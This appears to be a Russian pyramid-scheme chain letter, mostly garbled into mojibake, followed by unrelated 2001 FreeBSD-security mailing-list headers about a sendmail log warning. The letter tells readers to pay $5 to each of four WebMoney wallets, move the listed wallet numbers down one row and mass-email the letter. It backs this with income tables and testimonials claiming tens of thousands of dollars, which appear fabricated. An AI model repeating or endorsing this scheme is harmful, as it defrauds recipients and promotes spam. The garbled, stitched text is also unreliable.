REPORT #2 Âàì ïîêàæåò ñàìûå ëó÷øèå ìåòîäû ìàññîâîé ðàññûëêè e-mail è ãäå ìîæíî íàéòè ïåðå÷åíü àäðåñîâ.

ÌÅÒÎÄ #2 - ÁÅÑÏËÀÒÍÀß ÐÅÊËÀÌÀ Â ÈÍÒÅÐÍÅÒÅ

Ðåêëàìà â Èíòåðíåòå ÿâëÿåòñÿ íåòðåáîâàòåëüíîé è ñóùåñòâóåò òûñÿ÷à ÁÅÑÏËÀÒÍÛÕ ìåñò äëÿ ðåêëàìû. Ñêàæåì, íàïðèìåð, ÷òî âû íà÷íåòå ñêðîìíî, òîëüêî äëÿ òîãî, ÷òîáû óçíàòü äåéñòâóåò ëè ýòî. Âàøåé öåëüþ áû áûëî íàéòè âñåãî ëèøü 10 ÷åëîâåê íà ïåðâûé óðîâåíü òî åñòü òåõ, êòî çàêàçàë áû ó Âàñ REPORT#1 (ðàçìåùåíèåì áåñïëàòíûõ îáúÿâëåíèé â Èíòåðíåò ëåãêî íàéòè è áîëüøåå êîëè÷åñòâî çàêàçîâ).

Äàëüøå ïðåäïîëîæèì, ÷òî êàæäûé èç Âàøåé îðãàíèçàöèè íàéäåò òîëüêî 10 ÷åëîâåê. Ïîñìîòðèì íà ïðèìåðå è óâèäèì, ÷òî ïðîèçîéäåò:

  1. 1-é level - âàøèõ 10 êëèåíòîâ ïî 5 USD.............................50,- USD.
  2. 2-é level - ïî 10 êëèåíòîâ îò òåõ 10-òè (5,- USD x 100) ........ 500,- USD.
  3. 3-é level - ýòî óæå 1.000 êëèåíòîâ (5,- USD x 1.000) ........5.000,- USD.
  4. 4-é level - 10.000 êëèåíòîâ (5,- USD x 10.000) ............... 50.000,- USD.

Èòîãî 55.550,- USD.

Ïîìíèòå, ÷òî ýòî òîëüêî ïðèìåð äëÿ 10 êëèåíòîâ. Ìíîãèå ëþäè íàéäóò ñîòíè êëèåíòîâ!!! ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ!!! Âñå, ÷òî âû äîëæíû ñäåëàòü, çà êàæäûå $5 USD, êîòîðûå ïîëó÷èòå â ñâîé êîøåëåê - ýòî ïîñëàòü ïîêóïàòåëþ çàêàçàííûé REPORT. È ÝÒÎ ÂÑÅ!!! ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ, ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!! Ýòî Âàì ãàðàíòèðóåò, ÷òî e-mail, êîòîðûå áóäóò ïîñûëàòü ñ ÂÀØÈÌ èìåíåì, áóäóò áûñòðåå ðàñïðîñòðàíÿòüñÿ, ïîòîìó ÷òî îíè íå ìîãóò áûòü ïîñëàíû ïîêà REPORT's íåò ó âàøåãî çàêàç÷èêà!!!

ÈÒÀÊ, ÄÎÑÒÓÏÍÛÅ REPORT's:

****** Çàêàæè ñåáå êàæäûé èç íèõ ñîãëàñíî íîìåðó è íàçâàíèþ ******

 

ÇÀÊÀÆÈÒÅ ÑÅÁÅ REPORT's ÑÅÉ×ÀÑ !!!

 

Òàáëèöà 1. REPORT's è ðåêâèçèòû ïðîäàâöîâ.

¹ Ïåðå÷åíü REPORT's R- è Z- êîøåëüêè ïðîäàâöà E-mail ïðîäàâöà
1 REPORT #1 "Ðóêîâîäñòâî ïî áåñïëàòíîé è ýôôåêòèâíîé ðåêëàìå â Èíòåðíåò" R871542342557

Z469857407500

WM_13@yahoo.com
2 REPORT #2 "Ðóêîâîäñòâî ïî ìàññîâîé ðåêëàìíîé ðàññûëêå E-Mail " R803112125203

Z460897718401

verysimplejob@yahoo.com
3 REPORT #3 "Ñåêðåòû ìíîãîóðîâíåâîãî ìàðêåòèíãà â Èíòåðíåò" R916511407235

Z601004161913

poul007@narod.ru
4 REPORT #4 "Êàê ñòàòü ìèëëèîíåðîì, èñïîëüçóÿ MLM è Èíòåðíåò" R117465742973

Z095492416150

asebo@mail.ru

Ñ ëþáûì èç ïðîäàâöîâ âñåãäà ìîæíî ñâÿçàòüñÿ ÷åðåç åãî e-mail. Íî, ïîæàëóéñòà, íå çàãðóæàéòå èõ ëèøíèìè âîïðîñàìè, îíè ìîãóò áûòü î÷åíü çàíÿòû îáðàáîòêîé çàêàçîâ (îñîáåííî íà òðåòüåì è ÷åòâåðòûõ óðîâíÿõ).

ÂÎÒ, ×ÒÎ ÍÓÆÍÎ ÑÄÅËÀÒÜ ÂÀÌ:

1. Ñêîïèðîâàòü ïðîãðàììó WebMoney keeper 2 è ñîçäàòü ñåáå ðóáëåâûé R-êîøåëåê.

Èíñòðóêöèè ïî ðàáîòå ñ êîøåëüêîì è èíôîðìàöèÿ îá ýòîé ñèñòåìå ïëàòåæåé

íà ñàéòå http://www.webmoney.ru

2. Ïîïîëíèòü ÑÂÎÉ êîøåëåê ðóáëåâûì ýêâèâàëåíòîì $20 + 3% ïî êóðñó ÖÁ, âûáðàâ

ëþáîé èç äîñòóïíûõ íà http://www.webmoney.ru/rus/perevods.htm ñïîñîáîâ ïåðåâîäà.

3. Ïîñëå ïîñòóïëåíèÿ äåíåã â âàø êîøåëåê, çàêàæèòå ñåáå âñå ÷åòûðå REPORT's

(èç ïåðå÷íÿ Òàáëèöû 1), ïóòåì ïåðåâîäà WebMoney èç ñâîåãî êîøåëüêà â êîøåëåê

ïðîäàâöà, ñóììû $5 ÑØÀ ïî êóðñó ÖÁ, çà êàæäûé REPORT. Îáÿçàòåëüíî, óêàæèòå

â ïîëå êîììåíòàðèÿ íîìåð REPORT è îáðàòíûé e-mail àäðåñ.

Ïðèìåð: REPORT#1 xxxxxx@xxxx.xxx

(Ïîäòâåðäèòå îïëàòó ïî e-mail)

4. Â Òàáëèöå 1, óäàëèòå íîìåð êîøåëüêà èç ñòðîêè 4 è ïåðåìåñòèòå íà åãî ìåñòî

íîìåð êîøåëüêà èç ñòðîêè 3. Çàòåì, ïåðåìåñòèòå íîìåð êîøåëüêà èç ñòðîêè 2

â îñâîáîäèâøååñÿ ìåñòî â ñòîðîêå 3. È, íàêîíåö, ïåðåìåñòèòå íîìåð êîøåëüêà èç

ñòðîêè 1 â ñòðîêó 2.

 îñâîáîäèâøååñÿ ìåñòî â ñòðîêå 1 âñòàâüòå íîìåð ñâîåãî R- êîøåëüêà.

Òåïåðü Âû ñòàëè ïðîäàâöîì REPORT#1.

5. Òîæå ñàìîå ïðîäåëàéòå ñ e-mail àäðåñàìè.

  • ÏÐÈÌÅ×ÀÍÈÅ:

    *Çà êàæäûé REPORT ïåðåâåäèòå ðóáëåâûé ýêâèâàëåíò $5 USD ïî êóðñó ÖÁ, ñî ñâîåãî êîøåëüêà íà íîìåð êîøåëüêà ïðîäàâöà. (USD ïîòîìó, ÷òî â ýòî âîâëå÷åíû æåëàþùèå ñî âñåãî ñâåòà). Âñå îïåðàöèè îò ñîçäàíèÿ êîøåëüêà äî îïëàòû REPORT's ïðîèçâîäÿòñÿ â ïðîãðàììå WebMoney Keeper.

    *Â êîøåëüêå, äåíüãè õðàíÿòñÿ â âèäå óñëîâíûõ åäèíèö (WebMoney).

    Ïî êóðñó 1WM = 1 ðóá. äëÿ R- êîøåëüêà

    1WM = 1 äîëëàð ÑØÀ äëÿ Z- êîøåëüêà.

    *Êîãäà ñäåëàåòå ñâîé çàêàç, óáåäèòåñü, ÷òî âû çàêàçàëè âñå REPORT. Âñå îíè ïîíàäîáÿòñÿ äëÿ òîãî, ÷òîáû Âû ñîõðàíèëè ó ñåáÿ â êîìïüþòåðå è, ïîòîì, ìîãëè ïðîäàâàòü êîïèè. Âàì äåéñòâèòåëüíî íóæíû âñå ýòè REPORT, èíà÷å ëþäè íå ñìîãóò ñäåëàòü ó âàñ çàêàç, à ñàìîå ãëàâíîå, ýòè REPORT's ñîäåðæàò âàæíóþ èíôîðìàöèþ î òîì, êàê èì äîñòè÷ü óñïåõà!! È ðàçâèâàòü ýòîò áèçíåññ.

    * òå÷åíèè íåñêîëüêèõ äíåé ïîñëå îïëàòû, âû ïîëó÷èòå ÷åòûðå e-mail, â êàæäîì ïî îäíîìó REPORT(ó). Ñîõðàíèòå èõ â âàøåì êîìïüþòåðå (è íà äèñêåòå äëÿ íàäåæíîñòè), ÷òîáû îíè âñåãäà áûëè ãîòîâû ê ïîñûëêå òûñÿ÷àì ëþäåé, êîòîðûå èõ ó âàñ çàêàæóò. Òåïåðü ýòî Âàø òîâàð, ñ ïðàâîì ïðîäàæè!

  • ÂÀÆÍÎ: - íå ìåíÿéòå íîìåðà êîøåëüêîâ, êîòîðûå íàõîäÿòñÿ â ñïèñêå çà êàæäûì èç REPORT's (íèêàêèì ñïîñîáîì), òîëüêî òàê, êàê ýòî óêàçàíî â ïóíêòàõ (1 - 5), èíà÷å ïîòåðÿåòå áîëüøóþ ÷àñòü ñâîèõ äîõîäîâ. Êîãäà ïîéìåòå, êàê ýòî äåéñòâóåò, Âàì ñðàçó ñòàíåò ïîíÿòíî, ïî÷åìó ýòî ïåðåñòàåò äåéñòâîâàòü, êîãäà ÷òî-íèáóäü èçìåíèøü íå ïî ïóíêòàì(1 - 5) . Ïîìíèòå, ýòîò ìåòîä áûë ïðîâåðåí, è åñëè Âû èçìåíèòå åãî, îí ïåðåñòàíåò ðàáîòàòü!!

    Âîçüìèòå ýòîò äîêóìåíò ñ èçìåíåííûì ïåðå÷íåì èìåí è ñ÷åòîâ è ñêîïèðóéòå åãî íà âàø êîìïüþòåð. Òåïåðü âû ãîòîâû ê ðàáîòå è ìîæåòå ðàññûëàòü ýòî ïðåäëîæåíèå â ïîèñêàõ ñâîèõ êëèåíòîâ, íî ïðåäâàðèòåëüíî îáÿçàòåëüíî ïðî÷èòàéòå âñå ÷åòûðå ðóêîâîäñòâà - îíè ñèëüíî ïîìîãóò âàì. Íå äåëàéòå íèêàêèõ èçìåíåíèé â ÷àñòè ÈÍÑÒÐÓÊÖÈÈ!!! Âàø ôèíàíñîâûé âêëàä â äàííîå ïðåäïðèÿòèå ÿâëÿåòñÿ ïðàêòè÷åñêè íè÷òîæíûì (êîíå÷íî æå åñëè âû ìîæåòå ïîçâîëèòü ñåáå èíâåñòèðîâàòü 20,- USD, èëè, íàïðèìåð, ìîæåòå ñëîæèòüñÿ ñ äðóçüÿìè. ×åì áîëüøå áóäåò Âàñ äëÿ ïîñûëêè ðåêëàìû è email, òåì áîëüøå âû èõ ïîøëåòå!. Âû, êîíå÷íî æå, óæå ïîäêëþ÷åíû ê ñåòè Èíòåðíåò è èìååòå áåñïëàòíûé e-mail!  ïîìîùü Âàì ñ âàøèì ìàðêåòèíãîì, ñîçäàíû 4 REPORT(ðóêîâîäñòâà), êîòîðûå âû çàêàçàëè. Îíè ñîäåðæàò ïîëåçíóþ èíôîðìàöèþ, íàïðèìåð, êàê ïîñûëàòü ìàññîâóþ ïî÷òîâóþ ðàññûëêó (e-mail), ãäå íàéòè òûñÿ÷ó âîçìîæíîñòåé ñäåëàòü áåñïëàòíóþ ðåêëàìó è ò.ä. Òàêæå âàì áóäóò äàíû èíôîðìàöèè îá ÈÍÒÅÐÍÅÒ-ÌÀÐÊÅÒÈÍÃ-ÊËÓÁÀÕ. Çäåñü íàéäåòå êîíôåðåíöèþ, ãäå èíòåðíåò-ïðåäïðèíèìàòåëè ñ öåëîãî ñâåòà âçàèìíî îáìåíèâàþòñÿ èíôîðìàöèåé è ñåêðåòàìè óñïåõà. Êëóá òàêæå áåñïëàòíî ïðåäîñòàâëÿåò èíòåðíåòîâûå èíñòðóìåíòû è óñëóãè äëÿ ñîçäàíèÿ ÑÎÁÑÒÂÅÍÍÎÃÎ ÈÍÒÅÐÍÅÒ ÏÐÅÄÏÐÈßÒÈß. Ïîñòàâÿò áåñïëàòíî software äëÿ îòïðàâëåíèÿ ìàññîâûõ e-mail è êàæäûé äåíü 1.000.000 íîâûõ e-mail àäðåñîâ. Òàêæå Âàì ïîñîâåòóþò, ãäå íàéòè áåñïëàòíóþ WEB ñòðàíèöó, êàê ïîëó÷èòü TOP îöåíêó â ïîèñêîâûõ ïðîãðàììàõ äëÿ Âàøåé ñòðàíèöû, êàê ïðîäàòü Âàø ïðîäóêò ïðè ïîìîùè ðåêëàìû, áþëëåòåíåé, áàííåðîâ è ìíîãî äðóãèõ ñîâåòîâ. Àäðåñ IMR: http://www.marketingontheweb.net Ïðèëîæåíèå àäðåñîâ ñî ñïèñêàìè è ïîèñêîâûìè ïðîãðàììàìè e-mail àäðåñîâ:

    http://www.whowhere.lycos.com/Email

    http://www.infospace.com/info/email1.htm

    !!! ÎÁßÇÀÒÅËÜÍÎ ÏÐÎÂÅÐÜÒÅ ÏÐÀÂÈËÜÍÎÑÒÜ ÈÇÌÅÍÅÍÈß ÒÀÁËÈÖÛ !!!

    Ïðèáëèçèòåëüíî 50.000 íîâûõ ëþäåé ïîäêëþ÷àþòñÿ ê Èíòåðíåòó êàæäûé ìåñÿö!

  • Ïðîâåðüòå, îñîáåííî âíèìàòåëüíî, ïðàâèëüíîñòü óêàçàíèÿ íîìåðà êîøåëüêà ïðè ïåðåâîäå. Ýòî î÷åíü âàæíî, òàê êàê ïîêà íå çàïëàòèòå ïðàâèëüíî, çàêàç íå ïðèäåò, à Âû íå ïîëó÷èòå ñâîé report. Íàéäèòå âðåìÿ, ÷òîáû âû ñìîãëè ñäåëàòü âñå ïðàâèëüíî è íå òîðîïÿñü, ïîòîìó ÷òî ýòî îñíîâà Âàøåãî áèçíåñà.
  • ************* ÑÎÂÅÒÛ Ê ÓÑÏÅÕÓ ************

    *Ñ×ÈÒÀÉÒÅ ÝÒÎ ÑÂÎÈÌ ÁÈÇÍÅÑÎÌ!!! Áóäüòå áûñòðûìè, ïðîôåññèîíàëüíûìè è ïðèäåðæèâàéòåñü èíñòðóêöèé.

    *Çàêàæèòå ñåáå ÷åòûðå REPORT's ÏÐßÌÎ ÑÅÉ×ÀÑ, ÷òîáû âû èõ èìåëè, êîãäà ê âàì íà÷íóò ïðèõîäèòü çàêàçû, ïîòîìó ÷òî:

    *Êîãäà ïîëó÷èòå $5 ÑØÀ, âû ÄÎËÆÍÛ ïîñëàòü æåëàåìûé ïðîäóêò (REPORT)!

    * ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!!!

    *Áóäüòå òåðïåëèâû è íå ñäàâàéòåñü!! Åñëè áóäåòå òî÷íî èñïîëíÿòü ïðåäïèñàíèÿ, Âàøè

    ðåçóëüòàòû ÁÓÄÓÒ ÓÑÏÅØÍÛÌÈ!!!!

    *À ÃËÀÂÍÎÅ, ÂÅÐÜÒÅ Â ÑÅÁß È ÒÎÌÓ, ×ÒÎ Ó ÂÀÑ ÏÎËÓ×ÈÒÜÑß!!!!!!!

    ************ ÍÀØÈ ÐßÄÛ ÓÑÏÅÕÀ ***********

    Ïðèäåðæèâàéòåñü ýòèõ ðÿäîâ è ó âàñ âñå ïîëó÷èòüñÿ: Åñëè íå ïîëó÷èòå 20 çàêàçîâ íà Report #1 â òå÷åíèè äâóõ íåäåëü, ïðîäîëæàéòå äåëàòü ðåêëàìó è ïîñûëàòü e-mail, äî òåõ ïîð, ïîêà èõ íå ïîëó÷èòå. Ïîòîì âû â òå÷åíèè íåñêîëüêèõ íåäåëü Âû äîëæíû ïîëó÷èòü çàêàçû íà Report #2. Åñëè ýòî íå ïðîèçîéäåò, íå ïåðåñòàâàéòå ïîñûëàòü ðåêëàìó äî òåõ ïîð, ïîêà íå äîñòèãíèòå 100 çàêàçîâ íà Report #2. Êàê òîëüêî ïîëó÷èòå 100 çàêàçîâ íà Report #2, ÌÎÆÅÒÅ ÍÀ×ÀÒÜ ÎÒÄÛÕÀÒÜ, ïîòîìó ÷òî ñèñòåìà â ýòîì ñëó÷àå óæå ðàáîòàåò çà Âàñ à Âàøè äåíüãè áóäóò ïðèõîäèòü ñàìè ïî ñåáå.

    ÝÒÎ ÂÀÆÍÎ ÇÀÏÎÌÍÈÒÜ: Âñåãäà, êîãäà âàøå èìÿ ïðîäâèãàåòñÿ âíèç ïî ñïèñêó, Âû ïîëó÷àåòå çàêàç íà ñëåäóþùèé Report, ïîýòîìó ìîæåòå ñëåäèòü ñâîå ïðîäâèæåíèå, ïî òîìó êàêîé êàêîé Report îò Âàñ çàêàçûâàþò ëþäè! Åñëè ïîæåëàåòå ïîâûñèòü ñâîé äîõîä, òî ïðîñòî ïîñûëàéòå íîâóþ ïàðòèþ e-mail. Òàê Âû íà÷íåòå âåñü ïðîöåññ ñíà÷àëà. ÍÅ ÑÓÙÅÑÒÂÓÅÒ ÍÈÊÀÊÎÉ ÃÐÀÍÈÖÛ ÏÐÈÁÛËÈ, ÊÎÒÎÐÓÞ ÌÎÆÍÎ ÄÎÑÒÈÃÍÓÒÜ Â ÝÒÎÌ ÁÈÇÍÅÑÅ!!! Ïåðåä òåì, êàê ðåøèòå õîòèòå ýòèì çàíèìàòüñÿ èëè íåò, ïðî÷èòàéòå ñëåäóþùèå ôàêòû îá ýòîé ïðîãðàììå:

    1. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÏÐÎÈÇÂÎÄÑÒÂÎ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    2. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÒÐÀÍÑÏÎÐÒÈÐÎÂÊÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    3. ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÐÅÊËÀÌÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ!
    4. ÈÑÏÎËÜÇÓÅÒÅ ÑÈËÓ ÈÍÒÅÐÍÅÒÀ È MULTI-LEVEL MARKETING!
    5. ÂÀØÅÉ ÅÄÈÍÑÒÂÅÍÍÎÉ ÂÛÄÀ×ÅÉ ÊÐÎÌÅ ÍÀ×ÀËÜÍÎÉ ÈÍÂÅÑÒÈÖÈÈ 20,- USD ßÂËßÅÒÑß ÒÎËÜÊÎ ÂÀØÅ ÂÐÅÌß!
    6. ÂÅÑÜ ÇÀÐÀÁÎÒÎÊ ÊÎÒÎÐÛÉ ÂÛ ÏÎËÓ×ÈÒÅ ßÂËßÅÒÑß ×ÈÑÒÎÉ ÏÐÈÁÛËÜÞ!
    7. ÝÒÀ ÏÐÎÃÐÀÌÌÀ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!

     

    ***** ÎÏÛÒ ÄÐÓÃÈÕ *****

    Ýòà ïðîãðàììà äåéñòâóåò, íî âû äîëæíû òî÷íî èñïîëíÿòü èíñòðóêöèè! ÃËÀÂÍÎÅ ÍÅ ÏÎÌÅÙÀÉÒÅ ÂÀØÅ ÈÌß ÍÀ ÄÐÓÃÓÞ ÏÎÇÈÖÈÞ, ÝÒÎ ÎÁÎÉÄÅÒÑß ÂÀÌ ÁÎËÜØÎÉ ÏÎÒÅÐÅÉ ÄÅÍÅÃ, ÝÒÎ ÏÐÎÑÒÎ ÍÅ ÄÅÉÑÒÂÓÅÒ!!!

    ß - ðåàëüíîå äîêàçàòåëüñòâî ðàáîòîñïîñîáíîñòè ýòîãî áèçíåñà. Ýòî äåéñòâèòåëüíî ïðåâîñõîäíàÿ âîçìîæíîñòü, òàê ðåàëüíî è ëåãêî çàðàáîòàòü äåíüãè ñ ìèíèìàëüíûì âêëàäîì. Åñëè ðåøèòåñü ýòî ïîïðîáîâàòü, ïðèäåðæèâàéòåñü èíñòðóêöèé ïðîãðàììû è áóäåòå íà ëó÷øåé äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè.

    Steven Bardfield, Portland, OR

    ************************************************************

    Ýòà ïðîãðàììà äåéñòâèòåëüíî äåéñòâóåò. Æèâó íå â Àìåðèêå, à â Åâðîïå è ñíà÷àëà ÿ áîÿëñÿ, íå áûë óâåðåí, äåéñòâèòåëüíî ëè ýòî äåéñòâóåò, à ïîòîìó, íå îòíîñèëñÿ ê ýòîìó ñåðüåçíî. À ïîòîì ñêàçàë ñåáå: "À ïî÷åìó íåò?". Ñîçäàë êîøåëåê, ïîïîëíèë åãî , è ñäåëàë ïåðåâîä, çàêàçàâ ñåáå ÷åòûðå Reporty.  òå÷åíèè 5-è äíåé ïîëó÷èë èõ âñåõ ïî e-mail.

    Äîëüøå âñåãî ïðèøëîñü æäàòü Report #4. Íî ýòî è ïîíÿòíî, âåäü ó ïðîäàâöà ýòîãî, ïîñëåäíåãî óðîâíÿ, òûñÿ÷è çàêàçîâ. Âñå ñäåëàë òî÷íî ïî èíñòðóêöèè (÷òîáû áûòü óâåðåííûì, åñëè ýòî äåëî íå çàðàáîòàåò, òî ýòî íå ïðè÷èíà ìîåé îøèáêè) è æäàë. ß âíèìàòåëüíî ïðî÷èòàë âñå ïîëó÷åííûå ðóêîâîäñòâà, à êîãäà óçíàë, êàê âñå íàäî äåëàòü, íà÷àë ñâîé áèçíåñ. ß èñêàë àäðåñà âåçäå è ñäåëàë ñåáå äëèííûé ñïèñîê (ìíå ýòî áûëî äåéñòâèòåëüíî èíòåðåñíî, ýòî áûëî êàê íîâîå õîááè, è ÿ íå ìîã íè÷åãî ïîòåðÿòü), êàê íåíîðìàëüíûé ÿ íà÷àë ïîñûëàòü e-mail ëþäÿì â öåëîì ñâåòå. Äåëàë ÿ ýòî ïîñòîÿííî, è êàæäûé äåíü êîíòðîëèðîâàë ñâîé ïî÷òîâûé ÿùèê è êîøåëåê. Ïðèìåðíî ÷åðåç äåíü íà÷àëè ïðèõîäèòü çàêàçû. Äî ñèõ ïîð ïîìíþ òîò ìîìåíò, êîãäà îáíàðóæèë ïåðâûé çàêàç. Íåêîòîðîå âðåìÿ ÿ ïðîñòî ñòîÿë è íå ìîã äâèãàòüñÿ: "Ýòî ðàáîòàåò! Ýòà øòóêà çàðàáîòàëà ìàòü åå òàê!". Ïðîøó ïðîùåíèÿ çà âûðàæåíèå, íî ß áûë î÷åíü ñ÷àñòëèâ, è íà÷àë ïîñûëàòü åùå áîëüøå e-mail, ïîÿâèëñÿ ñèëüíåéøèé ñòèìóë ê ðàáîòå. Íà ñëåäóþùèé äåíü - ïóñòîé ÿùèê è ñíîâà ÿ ïîäóìàë, ÷òî ýòî íå áóäåò ðàáîòàòü, íî îêàçàëîñü íàîáîðîò. Íà ñëåäóþùèé äåíü ÿ ïîëó÷èë 3 çàêàçà, â òîò æå ìîìåíò ÿ ïîñëàë ëþäÿì èõ reporty, ÷òîáû ìîãëè òîæå áûñòðî çàðàáîòàòü äåíüãè (äëÿ ñåáÿ è äëÿ ìåíÿ). Çà äâå íåäåëè, êàæäûé äåíü ÿ ñèäåë ïðèìåðíî 30 ìèíóò ó êîìïüþòåðà è ïîñûëàë çàêàçû.  òå÷åíèè äâóõ íåäåëü ÿ ïîëó÷èë 29 çàêàçîâ íà Report #1. Ïîòîì çàêàçû ñòàëè ïðèõîäèòü ÷àùå è áûñòðåå, êàæäóþ íåäåëþ ÿ ïîëó÷àë îêîëî ñòà çàêàçîâ, a äåíüãè âñå ïîñòóïàëè íà ìîé ñ÷åò.  öåëîì ÿ çàðàáîòàë îêîëî 64.000,- USD.  ÝÒÎ ÍÅ ÂÎÇÌÎÆÍÎ ÁÛËÎ ÏÎÂÅÐÈÒÜ! Íà ïðîøëîé íåäåëå ÿ êóïèë ñåáå íîâóþ òà÷êó è ýòî áëàãîäàðÿ ïðîãðàììå. Åñëè è òåïåðü Âû íå çíàåòå, ÷òî äåëàòü, òàê ÿ Âàì ãîâîðþ

    Ï_Î_Ï_Ð_Î_Á_Ó_É_Ò_Å è íå ïîæàëååòå. Ýòî Âàø øàíñ, åñëè åãî óïóñòèòå, òàê áóäåòå æàëåòü îá ýòîì äî êîíöà æèçíè!

    Í. Ðåáðîâ, Ðîññèÿ.

    ************************************************************

    Ìåíÿ çîâóò Mitchell a ìîÿ æåíà Jody, æèâåì â ×èêàãî. ß áóõãàëòåð â îäíîé àìåðèêàíñêîé ôèðìå è çàðàáàòûâàþ íà æèçíü äîñòàòî÷íî äåíåã. Êîãäà ÿ ïîëó÷èë ýòîò e-mail, ÿ áûë çîë íà æåíó èç-çà ïîëó÷åíèÿ "junk mail" (ðåêëàìíûå ëèñòû, è ò.ä.., áåç ïîæåëàíèÿ). ß ïîñìåÿëñÿ íàä ïðåäëîæåíèåì, ÿ çíàë, ÷òî ýòî íå áóäåò äåéñòâîâàòü. Jody ìåíÿ àáñîëþòíî èãíîðèðîâàëà è íà÷àëà ýòèì çàíèìàòüñÿ. ß øóòèë íàä íåé è áûë ãîòîâ ïðîèçíåñòè èçâåñòíóþ ôðàçó "Âèäèøü, ÿ æå òåáå ãîâîðèë, ÷òî ýòî íå áóäåò äåéñòâîâàòü!" Íî ñìåÿëèñü ïîòîì íàäî ìíîé!!! Çà 45 äíåé îíà ïîëó÷èëà 47.200,- USD. ß áûë â øîêå!!! ß áûë óâåðåí, ÷òî ýòî íå äåéñòâóåò, a ýòî áûëà íåïðàâäà!!! ß ïðèñîåäèíèëñÿ ê Jody, äî ïåíñèè ìíå îñòàâàëîñü ñåìü ëåò, a ýòà ïðîãðàììà âåðíóëà ìíå æåëàíèå ðàáîòàòü, ïîòîìó ÷òî ÿ âèäåë ñâîè ðåçóëüòàòû!

    Mitchell Wolf, MD, Chicago, IL.

    ************************************************************

    Ãëàâíûì äîâîäîì ýòîãî ïèñüìà ÿâëÿåòñÿ òî, ÷òîáû óáåäèë âàñ, ÷òî ýòî ÷åñòíàÿ, ëåãàëüíàÿ, ïðèáûëüíàÿ ñèñòåìà äëÿ çàðàáàòûâàíèÿ áîëüøèõ äåíåã çà êîðîòêîå âðåìÿ. ß òîëüêî ïîïðîáîâàë, ÷òîáû óçíàòü, ÷òî ìîæíî ïîëó÷èòü âçàìåí çà ìèíèìàëüíûé âêëàä è ñòàðàíèå. Ê ìîåìó óäèâëåíèþ ÿ ïîëó÷èë 3.470,- USD çà ïåðâûõ 14 äíåé à îñòàëüíûå äåíüãè âñå åùå ïðèõîäÿò!!!

    Charles Morris, Esq.

    ************************************************************

    Since I am not the gambling type, several weeks passed before I decided to give it a try. I came to the conclusion that 20,- USD is such a small stake that there was simply no way I would fail to find at least a few orders to recover my investment. God, how surprised I was when I saw my wallet full of orders! After a while so many came in that I had to take time off work. This year I earned more money than in the last ten years! The best part is that it does not matter where people live. It is simply the best investment, with a very fast turnover.

    Paige Willis, Des Moines, IA.

    ************************************************************

    I had already received this program once. I deleted it, but later I thought it would have been worth trying. Of course, I had no idea when I would receive such an offer again, so I had to wait until someone sent it to me again. 11 months passed before I received it again. This time I did not delete it!!! The first time around I received 41.000,- USD!!!!

    Violet Wilson, Johnstown, PA.

    ************************************************************

    I am taking part in this program for the third time now. We quit our jobs, and after a while we bought ourselves a house on the beach and will live without thinking about money. There is only one way on Earth to make your plans come true: START CARRYING THEM OUT. For God's sake, do not miss this GOLDEN opportunity!!! Much happiness, and enjoy spending the money!

    Kerry Ford, Centerport, NY.

    ************************************************************

    ORDER YOUR REPORT`s RIGHT NOW AND SET OUT ON THE PATH TO INDEPENDENCE, FREEDOM AND HAPPINESS!

    NOW IS THE TIME TO ACHIEVE HUGE RESULTS!!

    PLEASE NOTE: If you need advice on how to start a business, register a trade name, or learn to pay taxes, contact the business affairs department. Your results depend only on you and on your work. This letter guarantees no income and no results, but all the amounts and results stated in this document are FACT.

    !!!EVERYTHING DEPENDS ON YOU ALONE!!!

    GREAT SUCCESS TO YOU!!!

    P.S. You can contact me at: WM_13@yahoo.com

    P.S. or visit my page: http://www.geocities.com/wm_13/

    Respectfully, Mikhail.

From owner-freebsd-security Wed Apr 4 8:27:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gilberto.physik.rwth-aachen.de (gilberto.physik.rwth-aachen.de [137.226.30.2]) by hub.freebsd.org (Postfix) with ESMTP id 2E5CC37B71E for ; Wed, 4 Apr 2001 08:27:13 -0700 (PDT) (envelope-from kuku@gilberto.physik.rwth-aachen.de)
Received: (from kuku@localhost) by gilberto.physik.rwth-aachen.de (8.11.1/8.9.3) id f34FRB571384 for freebsd-security@freebsd.org; Wed, 4 Apr 2001 17:27:11 +0200 (CEST) (envelope-from kuku)
Date: Wed, 4 Apr 2001 17:27:11 +0200 (CEST)
From: Christoph Kukulies
Message-Id: <200104041527.f34FRB571384@gilberto.physik.rwth-aachen.de>
To: freebsd-security@freebsd.org
Subject: sendmail (possible attack) in logs
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I'm seeing this for a couple of days now in my /var/log/messages:

Apr 3 18:28:12 gil sendmail[63971]: f33GSBt63970: Truncated MIME Content-Type header due to field size (possible attack)

Do I need to be concerned?

--
Chris Christoph P. U. Kukulies kuku@gil.physik.rwth-aachen.de

From owner-freebsd-security Wed Apr 4 9:10:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tholian.securitydynamics.com (mail.rsasecurity.com [204.167.112.129]) by hub.freebsd.org (Postfix) with SMTP id D2BDB37B71E for ; Wed, 4 Apr 2001 09:10:08 -0700 (PDT) (envelope-from dfinkelstein@rsasecurity.com)
Received: from sdtihq24.securid.com by tholian.securitydynamics.com via smtpd (for hub.freebsd.org [216.136.204.18]) with SMTP; 4 Apr 2001 16:07:43 UT
